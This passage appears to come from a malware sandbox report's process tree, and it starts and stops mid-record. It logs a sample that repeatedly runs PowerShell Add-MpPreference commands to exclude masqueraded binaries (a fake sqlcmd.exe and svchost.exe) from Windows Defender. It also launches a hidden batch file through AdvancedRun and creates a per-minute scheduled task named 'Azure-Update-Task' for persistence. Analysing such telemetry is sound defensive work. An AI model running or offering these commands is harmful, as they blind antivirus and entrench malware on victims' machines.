    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:212
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5832
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4680
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:3324
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6136
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6636
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:2384
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6704
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5676
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:5260
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4312
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6500
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:1616
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6336
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:5080
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4460
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7272
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7468
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5356
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2952
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4340
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6688
- - C:\Users\Admin\AppData\Local\Temp\e5b343cb-5458-41ff-9574-79dc5e3e9108\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\e5b343cb-5458-41ff-9574-79dc5e3e9108\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\e5b343cb-5458-41ff-9574-79dc5e3e9108\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3⤵
    PID:5896
  - - C:\Users\Admin\AppData\Local\Temp\e5b343cb-5458-41ff-9574-79dc5e3e9108\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\e5b343cb-5458-41ff-9574-79dc5e3e9108\AdvancedRun.exe" /SpecialRun 4101d8 5896
      4⤵
      PID:7956
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:3724
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    PID:7116
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    PID:2232
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    PID:7076
  - - C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
      4⤵
      Creates scheduled task(s)
      PID:7388
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:7992
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6380
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4944
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5876
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5900
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6388
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6020
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7632
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7816
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:8092
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4644
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:8100
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6200
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:3660
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:1324
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5504
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4656
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4468
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7184
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6124
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7552
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5276
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7536
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6364
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5672
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:972
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7908
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5072
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4240
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:5148
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:8076
- - C:\Users\Admin\AppData\Local\Temp\5e204bd8-7702-4861-8b4c-ef52471277f1\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\5e204bd8-7702-4861-8b4c-ef52471277f1\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\5e204bd8-7702-4861-8b4c-ef52471277f1\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3⤵
    PID:7836
  - - C:\Users\Admin\AppData\Local\Temp\5e204bd8-7702-4861-8b4c-ef52471277f1\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\5e204bd8-7702-4861-8b4c-ef52471277f1\AdvancedRun.exe" /SpecialRun 4101d8 7836
      4⤵
      PID:5296
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:5612
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    PID:3844
  - - C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
      4⤵
      Creates scheduled task(s)
      PID:4340
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:5356
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:3324
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6528
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6936
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:8084
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:1860
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5092
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:8104
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4832
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6560
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:796
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6780
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:3456
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5824
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7712
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6140
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6516
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2148
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:728
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7624
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7980
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4548
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4704
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7044
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4264
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6028
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:5512
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7528
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6580
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7768
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4112
- - C:\Users\Admin\AppData\Local\Temp\d1bf1100-8b10-45e5-9481-9f8b0489563b\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\d1bf1100-8b10-45e5-9481-9f8b0489563b\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\d1bf1100-8b10-45e5-9481-9f8b0489563b\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3⤵
    PID:4608
  - - C:\Users\Admin\AppData\Local\Temp\d1bf1100-8b10-45e5-9481-9f8b0489563b\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\d1bf1100-8b10-45e5-9481-9f8b0489563b\AdvancedRun.exe" /SpecialRun 4101d8 4608
      4⤵
      PID:7152
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6928
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    PID:4676
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
